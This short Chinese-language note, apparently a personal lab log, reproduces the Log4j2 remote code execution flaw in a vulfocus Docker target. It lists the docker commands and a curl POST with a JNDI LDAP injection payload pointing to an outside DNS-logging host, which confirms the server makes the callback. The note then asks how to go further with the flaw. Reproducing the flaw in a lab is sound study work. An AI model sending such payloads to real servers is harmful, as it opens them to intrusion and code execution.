复现现象:
这个镜像使用了log4j2用来当做靶机程序
1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09
2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09
3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名
4、执行一个post curl -X POST -F “payload=${jndi:ldap://king.xxxx.dns.1433.eu.org/exp}” http:/xxxxx:38080/hello
5、点击获取记录
这样说明log4j2 执行了上报dns记录。但是怎么利用这个漏洞呐?